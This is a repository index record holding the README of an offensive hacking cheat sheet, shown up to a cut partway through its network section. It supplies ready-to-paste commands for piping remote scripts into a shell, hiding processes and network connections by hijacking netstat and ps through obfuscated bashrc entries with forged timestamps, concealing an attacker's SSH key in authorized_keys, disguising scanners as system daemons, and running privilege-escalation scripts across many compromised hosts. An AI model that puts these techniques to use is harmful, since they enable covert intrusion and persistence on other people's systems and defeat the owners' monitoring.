{"id":13438034,"url":"https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet","last_synced_at":"2025-02-25T08:32:53.494Z","repository":{"id":37727309,"uuid":"235804364","full_name":"hackerschoice/thc-tips-tricks-hacks-cheat-sheet","owner":"hackerschoice","description":"Various tips \u0026 tricks","archived":false,"fork":false,"pushed_at":"2025-02-24T15:40:06.000Z","size":1108,"stargazers_count":3257,"open_issues_count":1,"forks_count":418,"subscribers_count":115,"default_branch":"master","last_synced_at":"2025-02-24T16:39:12.420Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hackerschoice.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-01-23T13:50:16.000Z","updated_at":"2025-02-24T15:40:13.000Z","dependencies_parsed_at":"2024-01-07T08:21:57.618Z","dependency_job_id":"c89dab11-2ba7-42a3-817e-48055c17009b","html_url":"https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet","commit_stats":{"total_commits":677,"total_committers":19,"mean_commits":35.63157894736842,"dds":0.2703101920236337,"last_synced_commit":"55269e6561d52d7ba2586d2dc6f93c740df95ca9"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hackerschoice","download_url":"https://codeload.github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":240631729,"owners_count":19832334,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T03:01:02.389Z","updated_at":"2025-02-25T08:32:53.431Z","avatar_url":"https://github.com/hackerschoice.png","language":"Shell","funding_links":[],"categories":["C","General cheat sheets","Shell","others","🛠️ Developer Tools","Table of Contents","Learning Resources"],"sub_categories":["Books and Cheatsheets","Cheatsheets"],"readme":"\u003c!-- Use `grip 8080` to render the markdown locally --\u003e\n# THC's favourite Tips, Tricks \u0026 Hacks (Cheat Sheet)\n\nhttps://thc.org/tips \n\nA collection of our favourite tricks. Many of those tricks are not from us. We merely collect them.\n\nWe show the tricks 'as is' without any explanation why they work. You need to know Linux to understand how and why they work.\n\nGot tricks? Join us [https://thc.org/ops](https://thc.org/ops)\n\n1. [Bash](#bash)\n 1. [Set up a Hack Shell](#hackshell)\n 1. [Hide your commands](#bash-hide-command)\n 1. [Hide your command line options](#zap)\n 1. [Hide a network connection](#bash-hide-connection)\n 1. [Hide a process as user](#hide-a-process-user)\n 1. [Hide a process as root](#hide-a-process-root)\n 1. [Hide scripts](#hide-scripts)\n 1. [Hide from cat](#cat)\n 1. [Execute in parallel with separate logfiles](#parallel)\n1. [SSH](#ssh)\n 1. [Almost invisible SSH](#ssh-invisible)\n 1. [Multiple shells via 1 SSH/TCP connection](#ssh-master)\n 1. [SSH tunnel](#ssh-tunnel)\n 1. [SSH socks5 tunnel](#ssh-socks-tunnel)\n 1. [SSH to NATed host](#ssh-j)\n 1. [SSH pivot via ProxyJump](#ssh-pj)\n 1. [SSHD as user](#sshd-user)\n1. [Network](#network)\n 1. [Discover hosts](#discover)\n 1. [Tcpdump](#tcpdump)\n 1. [Tunnel and forwarding](#tunnel)\n 1. [Raw TCP reverse ports](#ports)\n 1. [HTTPS reverse forwards](#https)\n 2. [Bouncing traffic with iptables](#iptables)\n 3. [Ghost IP / IP Spoofing](#ghost)\n 4. [Various](#tunnel-more)\n 1. [Use any tool via Socks Proxy](#scan-proxy)\n 1. [Find your public IP address](#your-ip)\n 1. [Check reachability from around the world](#check-reachable)\n 1. [Check/Scan Open Ports](#check-open-ports)\n 1. [Crack Passwords hashes](#bruteforce)\n 1. [Brute Force Passwords / Keys](#bruteforce)\n1. [Data Upload/Download/Exfil](#exfil)\n 1. [File Encoding/Decoding](#file-encoding)\n 1. [File transfer using cut \u0026 paste](#cut-paste)\n 1. [File transfer using screen](#xfer-tmux)\n 1. [File transfer using screen](#file-transfer-screen)\n 1. [File transfer using gs-netcat and sftp](#file-transfer-gs-netcat)\n 1. [File transfer using HTTP](#http)\n 1. [File download without curl](#download)\n 2. [File transfer using rsync](#rsync)\n 1. [File transfer to public dump sites](#trans) \n 1. [File transfer using WebDAV](#webdav)\n 1. [File transfer to Telegram](#tg) \n1. [Reverse Shell / Dumb Shell](#reverse-shell)\n 1. [Reverse Shells](#reverse-shell)\n 1. [with gs-netcat (encrypted)](#reverse-shell-gs-netcat)\n 1. [with Bash](#reverse-shell-bash)\n 2. [with cURL (encrypted)](#curlshell)\n 2. [with cURL (cleartext)](#curltelnet)\n 3. [with OpenSSL (encrypted)](#sslshell)\n 1. [with remote.moe (encrypted)](#revese-shell-remote-moe)\n 1. [without /dev/tcp](#reverse-shell-no-bash)\n 2. [with sshx.io (encrypted)](#sshx)\n 1. [with Python](#reverse-shell-python)\n 1. [with Perl](#reverse-shell-perl)\n 1. [with PHP](#reverse-shell-php)\n 1. [Upgrading the dumb shell](#reverse-shell-upgrade)\n 1. [Upgrade a reverse shell to a pty shell](#reverse-shell-pty)\n 1. [Upgrade a reverse shell to a fully interactive shell](#reverse-shell-interactive)\n 1. [Reverse shell with socat (fully interactive)](#reverse-shell-socat)\n1. [Backdoors](#backdoor)\n 1. [Background reverse shell](#backdoor-background-reverse-shell)\n 1. [authorized_keys](#backdoor-auth-keys)\n 1. [Remote access an entire network](#backdoor-network)\n 1. [Smallest PHP backdoor](#php-backdoor)\n 1. [Smallest reverse DNS-tunnel backdoor](#reverse-dns-backdoor)\n 1. [Local Root backdoor](#ld-backdoor)\n 1. [Self-extracting implant](#implant)\n1. [Host Recon](#hostrecon)\n1. [Shell Hacks](#shell-hacks)\n 1. [Shred files (secure delete)](#shred)\n 1. [Restore the date of a file](#restore-timestamp)\n 1. [Clean logfile](#shell-clean-logs)\n 1. [Hide files from a User without root privileges](#shell-hide-files)\n 1. [Make a file immutable](#perm-files)\n 1. [Change user without sudo/su](#nosudo)\n 1. [Obfuscate and crypt payload](#payload)\n 1. [Deploying a backdoor without touching the file-system](#memexec)\n1. [Crypto](#crypto)\n 1. [Generate quick random Password](#gen-password)\n 1. [Linux transportable encrypted filesystems](#crypto-filesystem)\n 1. [cryptsetup](#crypto-filesystem)\n 1. [EncFS](#encfs)\n 1. [Encrypting a file](#encrypting-file)\n1. [Session sniffing and hijacking](#sniffing)\n 1. [Sniff a user's SHELL session](#session-sniffing)\n 2. [Sniff all SHELL sessions with dtrace](#dtrace)\n 2. [Sniff all SHELL sessions with eBPF](#bpf)\n 1. [Sniff a user's SSH or SSHD session with strace](#ssh-sniffing-strace)\n 1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper)\n 1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit)\n 1. [Hijack / Take-over a running SSH session](#hijack)\n1. [VPN and Shells](#vpn-shell)\n 1. [Disposable Root Servers](#shell)\n 1. [VPN/VPS Providers](#vpn)\n1. [OSINT Intelligence Gathering](#osint)\n1. [Miscellaneous](#misc)\n 1. [Tools of the trade](#tools)\n 1. [Cool Linux commands](#cool-linux-commands)\n 1. [tmux Cheat Sheet](#tmux)\n 1. [Useful commands](#useful-commands)\n1. [How to become a Hacker](#hacker)\n1. [Other Sites](#others)\n\n---\n\u003ca id=\"bash\"\u003e\u003c/a\u003e\n## 1. Bash / Shell\n\u003ca id=\"hackshell\"\u003e\u003c/a\u003e\n**1.i. Set up a Hack Shell (bash):**\n\nMake BASH less noisy. Disables *~/.bash_history* and [many other things](https://github.com/hackerschoice/hackshell).\n```sh\n source \u003c(curl -SsfL https://thc.org/hs)\n```\nAlternative URL:\n```sh\n source \u003c(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)\n```\n\nAnd if there is no curl/wget, use [surl](#download) and (temporarily) installed curl with `bin curl`.\n```sh\nsource \u003c(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)\n# Afterwards type `bin curl` to (temporarily) install curl (in memory).\n```\n\nHackShell does much more but most importantly this:\n```sh\nunset HISTFILE\n[ -n \"$BASH\" ] \u0026\u0026 export HISTFILE=\"/dev/null\"\nexport BASH_HISTORY=\"/dev/null\"\nexport LANG=en_US.UTF-8\nlocale -a 2\u003e/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US\nexport LESSHISTFILE=-\nexport REDISCLI_HISTFILE=/dev/null\nexport MYSQL_HISTFILE=/dev/null\nTMPDIR=\"/tmp\"\n[ -d \"/var/tmp\" ] \u0026\u0026 TMPDIR=\"/var/tmp\"\n[ -d \"/dev/shm\" ] \u0026\u0026 TMPDIR=\"/dev/shm\"\nexport TMPDIR\nexport PATH=\".:${PATH}\"\nif [[ \"$SHELL\" == *\"zsh\" ]]; then\n PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '\nelse\n PS1='\\[\\033[36m\\]\\u\\[\\033[m\\]@\\[\\033[32m\\]\\h:\\[\\033[33;1m\\]\\w\\[\\033[m\\]\\$ '\nfi\nalias wget='wget --no-hsts'\nalias vi=\"vi -i NONE\"\nalias vim=\"vim -i NONE\"\nalias screen=\"screen -ln\"\n\nTERM=xterm reset -I\nstty cols 400 # paste this on its own before pasting the next line:\nresize \u0026\u003e/dev/null || { stty -echo;printf \"\\e[18t\"; read -t5 -rdt R;IFS=';' read -r -a a \u003c\u003c\u003c \"${R:-8;25;80}\";[ \"${a[1]}\" -ge \"${a[2]}\" ] \u0026\u0026 { R=\"${a[1]}\";a[1]=\"${a[2]}\";a[2]=\"${R}\";};stty sane rows \"${a[1]}\" cols \"${a[2]}\";}\n# stty sane rows 60 cols 160\n```\n\nBonus tip:\nAny command starting with a \" \" (space) will [not get logged to history](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces) either.\n```\n$ id\n```\n\n\u003ca id=\"bash-hide-command\"\u003e\u003c/a\u003e\n**1.ii. Hide your command / Daemonzie your command**\n\nThis will hide the *process name* only. Use [zapper](#zap) to also hide the command line options.\n\n```shell\n(exec -a syslogd nmap -Pn -F -n --open -oG - 10.0.2.1/24) # Note the brackets '(' and ')'\n```\n\nStart a background 'nmap' hidden as '/usr/sbin/sshd':\n```\n(exec -a '/usr/sbin/sshd' nmap -Pn -F -n --open -oG - 10.0.2.1/24 \u0026\u003enmap.log \u0026)\n```\n\nStart within a [GNU screen](https://linux.die.net/man/1/screen):\n```\nscreen -dmS MyName nmap -Pn -F -n --open -oG - 10.0.2.1/24\n### Attach back to the nmap process\nscreen -x MyName\n```\n\nAlternatively, copy the binary to a new name:\n```sh\ncd /dev/shm\ncp \"$(command -v nmap)\" syslogd\nPATH=.:$PATH syslogd -Pn -F -n --open -oG - 10.0.2.1/24\n```\n\nor use bind-mount to (temporarily) let */sbin/init* point to */dev/shm/nmap* instead:\n```shell\nmount -n --bind \"$(command -v nmap)\" /sbin/init\n# starting /sbin/init will instead execute nmap\n(/sbin/init -Pn -f -n --open -oG - 10.0.2.1/24 \u0026\u003enmap.log \u0026)\n```\n\n\u003ca id=\"zap\"\u003e\u003c/a\u003e\n**1.iii. Hide your command line options**\n\nUse [zapper](https://github.com/hackerschoice/zapper):\n```sh\ncurl -fL -o zapper https://github.com/hackerschoice/zapper/releases/latest/download/zapper-linux-$(uname -m) \u0026\u0026 \\\nchmod 755 zapper\n```\n\n```sh\n# Start Nmap but zap all options and show it as 'klog' in the process list:\n./zapper -a klog nmap -Pn -F -n --open -oG - 10.0.0.1/24\n# Started as a daemon and sshd-style name:\n(./zapper -a 'sshd: root@pts/0' nmap -Pn -F -n --open -oG - 10.0.0.1/24 \u0026\u003enmap.log \u0026)\n# Replace the existing shell with tmux (with 'exec').\n# Then start and hide tmux and all further processes - as some kernel process:\nexec ./zapper -f -a'[kworker/1:0-rcu_gp]' tmux\n```\n\n\u003ca id=\"bash-hide-connection\"\u003e\u003c/a\u003e\n**1.iv. Hide a Network Connection**\n\nThe trick is to hijack `netstat` and use grep to filter out our connection. This example filters any connection on port 31337 _or_ ip 1.2.3.4. The same should be done for `ss` (a netstat alternative).\n\n**Method 1 - Hiding a connection with bash-function in ~/.bashrc**\n\nCut \u0026 paste this to add the line to ~/.bashrc\n```shell\necho 'netstat(){ command netstat \"$@\" | grep -Fv -e :31337 -e 1.2.3.4; }' \u003e\u003e~/.bashrc \\\n\u0026\u0026 touch -r /etc/passwd ~/.bashrc\n```\n\nOr cut \u0026 paste this for an obfuscated entry to ~/.bashrc:\n```shell\nX='netstat(){ command netstat \"$@\" | grep -Fv -e :31337 -e 1.2.3.4; }'\necho \"eval \\$(echo $(echo \"$X\" | xxd -ps -c1024)|xxd -r -ps) #Initialize PRNG\" \u003e\u003e~/.bashrc \\\n\u0026\u0026 touch -r /etc/passwd ~/.bashrc\n```\n\nThe obfuscated entry to ~/.bashrc will look like this:\n```\neval $(echo 6e65747374617428297b20636f6d6d616e64206e6574737461742022244022207c2067726570202d4676202d65203a3331333337202d6520312e322e332e343b207d0a|xxd -r -ps) #Initialize PRNG\n```\n\n**Method 2 - Hiding a connection with a binary in $PATH**\n\nCreate a fake netstat binary in /usr/local/sbin. On a default Debian (and most Linux) the PATH variables (`echo $PATH`) lists /usr/local/sbin _before_ /usr/bin. This means that our hijacking binary /usr/local/sbin/netstat will be executed instead of /usr/bin/netstat.\n\n```shell\necho -e \"#! /bin/bash\nexec /usr/bin/netstat \\\"\\$@\\\" | grep -Fv -e :22 -e 1.2.3.4\" \u003e/usr/local/sbin/netstat \\\n\u0026\u0026 chmod 755 /usr/local/sbin/netstat \\\n\u0026\u0026 touch -r /usr/bin/netstat /usr/local/sbin/netstat\n```\n\n*(thank you iamaskid)*\n\n\u003ca id=\"hide-a-process-user\"\u003e\u003c/a\u003e\n**1.v. Hide a process as user**\n\nContinuing from \"Hiding a connection\" the same technique can be used to hide a process. This example hides the nmap process and also takes care that our `grep` does not show up in the process list by renaming it to GREP:\n\n```shell\necho 'ps(){ command ps \"$@\" | exec -a GREP grep -Fv -e nmap -e GREP; }' \u003e\u003e~/.bashrc \\\n\u0026\u0026 touch -r /etc/passwd ~/.bashrc\n```\n\n\u003ca id=\"hide-a-process-root\"\u003e\u003c/a\u003e\n**1.vi. Hide a process as root**\n\nThis requires root privileges and is an old Linux trick by over-mounting /proc/\u0026lt;pid\u0026gt; with a useless directory:\n```sh\nhide() {\n [[ -L /etc/mtab ]] \u0026\u0026 { cp /etc/mtab /etc/mtab.bak; mv /etc/mtab.bak /etc/mtab; }\n _pid=${1:-$$}\n [[ $_pid =~ ^[0-9]+$ ]] \u0026\u0026 { mount -n --bind /dev/shm /proc/$_pid \u0026\u0026 echo \"[THC] PID $_pid is now hidden\"; return; }\n local _argstr\n for _x in \"${@:2}\"; do _argstr+=\" '${_x//\\'/\\'\\\"\\'\\\"\\'}'\"; done\n [[ $(bash -c \"ps -o stat= -p \\$\\$\") =~ \\+ ]] || exec bash -c \"mount -n --bind /dev/shm /proc/\\$\\$; exec \\\"$1\\\" $_argstr\"\n bash -c \"mount -n --bind /dev/shm /proc/\\$\\$; exec \\\"$1\\\" $_argstr\"\n}\n```\n\nTo hide a command use:\n```sh\nhide # Hides the current shell/PID\nhide 31337 # Hides process with pid 31337\nhide sleep 1234 # Hides 'sleep 1234'\nhide nohup sleep 1234 \u0026\u003e/dev/null \u0026 # Starts and hides 'sleep 1234' as a background process\n```\n\n(thanks to *druichi* for improving this)\n\n\u003ca id=\"hide-scripts\"\u003e\u003c/a\u003e\n**1.vii. Hide shell scripts**\n\nAbove we discussed how to obfuscate a line in ~/.bashrc. An often used trick is to use `source` instead. The source command can be shortened to `.` (yes, a dot) _and_ it also searches through the $PATH variable to find the file to load.\n\nIn this example our script ```prng``` contains all of our shell functions from above. Those functions hide the `nmap` process and the network connection. Last we add `. prng` into the systemwide rc file. This will load `prng` when the user (and root) logs in:\n\n```shell\necho -e 'netstat(){ command netstat \"$@\" | grep -Fv -e :31337 -e 1.2.3.4; }\nps(){ command ps \"$@\" | exec -a GREP grep -Fv -e nmap -e GREP; }' \u003e/usr/bin/prng \\\n\u0026\u0026 echo \". prng #Initialize Pseudo Random Number Generator\" \u003e\u003e/etc/bash.bashrc \\\n\u0026\u0026 touch -r /etc/ld.so.conf /usr/bin/prng /etc/bash.bashrc\n```\n\n(The same works for `lsof`, `ss` and `ls`)\n\n\u003ca id=\"cat\"\u003e\u003c/a\u003e\n**1.viii. Hide from cat**\n\nANSI escape characters or a simple `\\r` ([carriage return](https://www.hahwul.com/2019/01/23/php-hidden-webshell-with-carriage/)) can be used to hide from `cat` and others.\n\nHide the last command (example: `id`) in `~/.bashrc`:\n```sh\necho -e \"id #\\\\033[2K\\\\033[1A\" \u003e\u003e~/.bashrc\n### The ANSI escape sequence \\\\033[2K erases the line. The next sequence \\\\033[1A\n### moves the cursor 1 line up.\n### The '#' after the command 'id' is a comment and is needed so that bash still\n### executes the 'id' but ignores the two ANSI escape sequences.\n```\nNote: We use `echo -e` to convert `\\\\033` to the ANSI escape character (hex 0x1b).\n\nAdding a `\\r` (carriage return) goes a long way to hide your ssh key from `cat`:\n```shell\necho \"ssh-ed25519 AAAAOurPublicKeyHere....blah x@y\"$'\\r'\"$(\u003cauthorized_keys)\" \u003eauthorized_keys\n### This adds our key as the first key and 'cat authorized_keys' won't show\n### it. The $'\\r' is a bash special to create a \\r (carriage return).\n```\n\n\u003ca id=\"parallel\"\u003e\u003c/a\u003e\n**1.ix. Execute in parallel with separate logfiles***\n\nScan 20 hosts in parallel and log each result to a separate log file:\n```sh\n# hosts.txt contains a long list of hostnames or ip-addresses\n# (Use -sCV for more verbose version)\ncat hosts.txt | parallel -j20 'exec nmap -n -Pn -sV -F --open -oG - {} \u003enmap_{}.txt'\n```\nNote: The example uses `exec` to replace the underlying shell with the last process (nmap, gsexec). It's optional but reduces the number of running shell binaries.\n\nExecute [Linpeas](https://github.com/carlospolop/PEASS-ng) on all [gsocket](https://www.gsocket.io/deploy) hosts using 40 workers:\n```sh\n# secrets.txt contains a long list of gsocket-secrets for each remote server.\ncat secrets.txt | parallel -j40 'mkdir host_{}; exec gsexec {} \"curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh\" \u003ehost_{}/linpeas.log 2\u003ehost_{}/linpeas.err'\n```\nNote: `xargs -P20 -I{}` is another good way but it cannot log each output into a separate file. \n\n---\n\u003ca id=\"ssh\"\u003e\u003c/a\u003e\n## 2. SSH\n\u003ca id=\"ssh-invisible\"\u003e\u003c/a\u003e\n**2.i. Almost invisible SSH**\n\nStops you from showing up in *w* or *who* command and stops logging the host to *~/.ssh/known_hosts*.\n```sh\nssh -o UserKnownHostsFile=/dev/null -T user@server.org \"bash -i\"\n```\n\nGo full comfort with PTY and colors: `xssh user@server.org`:\n\n```sh\n### Cut \u0026 Paste the following to your shell, then execute\n### xssh user@server.org\nxssh() {\n local ttyp=\"$(stty -g)\"\n echo -e \"\\e[0;35mTHC says: pimp up your prompt: Cut \u0026 Paste the following into your remote shell:\\e[0;36m\"\n echo -e '\\e[0;36msource \u003c(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)\\e[0m'\n echo -e \"\\e[2m# or: \\e[0;36m\\e[2mPS1='\"'\\[\\\\033[36m\\]\\\\u\\[\\\\033[m\\]@\\[\\\\033[32m\\]\\\\h:\\[\\\\033[33;1m\\]\\\\w\\[\\\\033[m\\]\\\\$ '\"'\\e[0m\"\n stty raw -echo icrnl opost\n [[ $(ssh -V 2\u003e\u00261) == OpenSSH_[67]* ]] \u0026\u0026 a=\"no\"\n ssh -oConnectTimeout=5 -oUserKnownHostsFile=/dev/null -oStrictHostKeyChecking=\"${a:-accept-new}\" -T \\\n \"$@\" \\\n \"unset SSH_CLIENT SSH_CONNECTION; LESSHISTFILE=- MYSQL_HISTFILE=/dev/null TERM=xterm-256color HISTFILE=/dev/null BASH_HISTORY=/dev/null exec -a [uid] script -qc 'source \u003c(resize 2\u003e/dev/null); exec -a [uid] bash -i' /dev/null\"\n stty \"${ttyp}\"\n}\n```\n\n\u003ca id=\"ssh-master\"\u003e\u003c/a\u003e\n**2.ii Multiple shells via 1 SSH/TCP connection**\n\nHave one TCP connection to the target and allow multiple users to piggyback on the same TCP connection to open further shell sessions.\n\nCreate a Master Connection:\n```sh\nssh -M -S .sshmux user@server.org\n```\n\nCreate further shell-sessions using the same (single) Master-TCP connection from above (no password/auth needed):\n```sh\nssh -S .sshmux NONE\n#ssh -S .sshmux NONE ls -al\n#scp -o \"ControlPath=.sshmux\" NONE:/etc/passwd .\n```\nCan be combined with [xssh](#ssh-invisible) to hide from utmp.\n\n\u003ca id=\"ssh-tunnel\"\u003e\u003c/a\u003e\n**2.iii SSH tunnel**\n\nWe use this all the time to circumvent local firewalls and IP filtering:\n```sh\nssh -g -L31337:1.2.3.4:80 user@server.org\n```\nYou or anyone else can now connect to your computer on port 31337 and get tunneled to 1.2.3.4 port 80 and appear with the source IP of 'server.org'. An alternative and without the need for a server is to use [gs-netcat](#backdoor-network).\n\nClever hackers use the keyboard combination `~C` to dynamically create these tunnels without having to reconnect the SSH. (thanks MessedeDegod).\n\nWe use this to give access to a friend to an internal machine that is not on the public Internet:\n```sh\nssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org\n```\nAnyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. An alternative and without the need for a server is to use [gs-netcat](#backdoor-network).\n\n\u003ca id=\"ssh-socks-tunnel\"\u003e\u003c/a\u003e\n**2.iv SSH socks4/5 tunnel**\n\nOpenSSH 7.6 adds socks support for dynamic forwarding. Example: Tunnel all your browser traffic through your server.\n\n```sh\nssh -D 1080 user@server.org\n```\nNow configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is now tunneled through *server.org* and will appear with the source IP of *server.org*. An alternative and without the need for a server is to use [gs-netcat](#backdoor-network).\n\nThis is the reverse of the above example. It give others access to your *local* network or let others use your computer as a tunnel end-point.\n\n```sh\nssh -g -R 1080 user@server.org\n```\n\nThe others configuring server.org:1080 as their SOCKS4/5 proxy. They can now connect to *any* computer on *any port* that your computer has access to. This includes access to computers behind your firewall that are on your local network. An alternative and without the need for a server is to use [gs-netcat](#backdoor-network).\n\n\u003ca id=\"ssh-j\"\u003e\u003c/a\u003e\n**2.v SSH to a host behind NAT**\n\n[ssh-j.com](http://ssh-j.com) provides a great relay service: To access a host behind NAT/Firewall (via SSH).\n\nOn the host behind NAT: Create a reverse SSH tunnel to [ssh-j.com](http://ssh-j.com) like so:\n```sh\n## Cut \u0026 Paste on the host behind NAT.\nsshj()\n{\n local pw\n pw=${1,,}\n [[ -z $pw ]] \u0026\u0026 { pw=$(head -c64 \u003c/dev/urandom | base64 | tr -d -c a-z0-9); pw=${pw:0:12}; }\n echo \"Press Ctrl-C to stop this tunnel.\"\n echo -e \"To ssh to ${USER:-root}@${2:-127.0.0.1}:${3:-22} type: \\e[0;36mssh -J ${pw}@ssh-j.com ${USER:-root}@${pw}\\e[0m\"\n ssh -o StrictHostKeyChecking=accept-new -o ServerAliveInterval=30 -o ExitOnForwardFailure=yes ${pw}@ssh-j.com -N -R ${pw}:22:${2:-0}:${3:-22}\n}\n\nsshj # Generates a random tunnel ID [e.g. 5dmxf27tl4kx] and keeps the tunnel connected\nsshj foobarblahblub # Creates tunnel to 127.0.0.1:22 with specific tunnel ID\nsshj foobarblahblub 192.168.0.1 2222 # Tunnel to host 192.168.0.1:2222 on the LAN\n```\n\nThen use this command from anywhere else in the world to connect as 'root' to 'foobarblahblub' (the host behind the NAT):\n```sh\nssh -J foobarblahblub@ssh-j.com root@foobarblahblub\n```\nThe ssh connection goes via ssh-j.com into the reverse tunnel to the host behind NAT. The traffic is end-2-end encrypted and ssh-j.com can not see the content.\n\n\n\u003ca id=\"ssh-pj\"\u003e\u003c/a\u003e\n**2.vi SSH pivoting to multiple servers**\n\nSSH ProxyJump can save you a lot of time and hassle when working with remote servers. Let's assume the scenario: \n\nOur workstation is $local-kali and we like to SSH into $target-host. There is no direct connection between our workstation and $target-host. Our workstation can only reach $C2. $C2 can reach $internal-jumphost (via internal eth1) and $internal-jumphost can reach the final $target-host via eth2.\n```sh\n $local-kali -\u003e $C2 -\u003e $internal-jumphost -\u003e $target-host\neth0 192.168.8.160 10.25.237.119 \neth1 192.168.5.130 192.168.5.135\neth2 172.16.2.120 172.16.2.121\n```\n\n\u003e We do not execute `ssh` on any computer but our trusted workstation - and neither shall you (ever).\n\nThat's where ProxyJump helps: We can 'jump' via the two intermediary servers $C2 and $internal-jumphost (without spawning a shell on those servers). The ssh-connection is end-2-end encrypted between our $local-kali and $target-host and no password or key is exposed to $C2 or $internal-jumphost.\n\n```sh \n## if we want to SSH to $target-host:\nkali@local-kali$ ssh -J c2@10.25.237.119,jumpuser@192.168.5.135 target@172.16.2.121\n\n## if we want to SSH to just $internal-jumphost:\nkali@local-kali$ ssh -J c2@10.25.237.119 jumpuser@192.168.5.135\n```\n\n\u003e We use this as well to hide our IP address when logging into servers. \n\n\u003ca id=\"sshd-user\"\u003e\u003c/a\u003e\n**2.vii SSHD as user land**\n\nIt is possible to start a SSHD server as a non-root user and use this to multiplex or forward TCP connection (without logging and when the systemwide SSHD forbids forwarding/multiplexing) or as a quick exfil-dump-server that runs as non-root:\n```sh\n# On the server, as non-root user 'joe':\nmkdir -p ~/.ssh 2\u003e/dev/null\nssh-keygen -q -N \"\" -t ed25519 -f sshd_key\ncat sshd_key.pub \u003e\u003e~/.ssh/authorized_keys\ncat sshd_key\n$(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -o GatewayPorts=yes -p 31337 # -Dvvv\n```\n```sh\n# On the client, copy the sshd_key from the server. Then login:\n# Example: Proxy connection via the server and reverse-forward 31339 to localhost:\nssh -D1080 -R31339:0:31339 -i sshd_key -p 31337 joe@1.2.3.4\n# curl -x socks5h://0 ipinfo.io\n```\n\n[SSF](https://securesocketfunneling.github.io/ssf/#home) is an alternative way to multiplex TCP over TLS.\n\n---\n\u003ca id=\"network\"\u003e\u003c/a\u003e\n## 3. Network\n\u003ca id=\"discover\"\u003e\u003c/a\u003e\n**3.i. Discover hosts**\n\n```sh\n## ARP discover computers on the _LOCAL_ network only\nnmap -n -sn -PR -oG - 192.168.0.1/24\n```\n\n```sh\n### ICMP discover hosts\nnmap -n -sn -PI -oG - 192.168.0.1/24\n```\n\n```sh\n## ICMP discover hosts (local LAN) ROOT\n# NET=\"10.11.0\" # discover 10.11.0.1-10.11.0.254\nseq 1 254 | xargs -P20 -I{} ping -n -c3 -i0.2 -w1 -W200 \"${NET:-192.168.0}.{}\" | grep 'bytes from' | awk '{print $4\" \"$7;}' | sort -uV -k1,1\n```\n\n---\n\u003ca id=\"tcpdump\"\u003e\u003c/a\u003e\n**3.ii. tcpdump**\n\n```sh\n## Monitor every new TCP connection\ntcpdump -np 'tcp[tcpflags] ^ (tcp-syn|tcp-ack) == 0'\n\n## Play a *bing*-noise for every new SSH connection\ntcpdump -nplq 'tcp[13] == 2 and dst port 22' | while read -r x; do echo \"${x}\"; echo -en \\\\a; done\n\n## Ascii output (for all large packets. Change to \u003e40 if no TCP options are used).\ntcpdump -npAq -s0 'tcp and (ip[2:2] \u003e 60)'\n```\n\n---\n\u003ca id=\"tunnel\"\u003e\u003c/a\u003e\n**3.iii. Tunnel and forwarding**\n\n```sh\n## Connect to SSL (using socat)\nsocat stdio openssl-connect:smtp.gmail.com:465\n\n## Connect to SSL (using openssl)\nopenssl s_client -connect smtp.gmail.com:465\n```\n\n```sh\n## Bridge TCP to SSL\nsocat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465\n```\n\n---\n\u003ca id=\"ports\"\u003e\u003c/a\u003e\n**3.iii.a Raw TCP reverse ports**\n\nUseful for reverse backdoors that need a TCP Port on a PUBLIC IP Address:\n\nUsing [segfault.net](https://thc.org/segfault.net) (free):\n```sh\n# Request a random public TCP port:\ncurl sf/port\necho \"Your public IP:PORT is $(cat /config/self/reverse_ip):$(cat /config/self/reverse_port)\"\nnc -vnlp $(cat /config/self/reverse_port)\n```\n\nUsing [bore.pub](https://github.com/ekzhang/bore) (free):\n```sh\n# Forward a random public TCP port to localhost:31337\nbore local 31337 --to bore.pub\n```\n\nusing 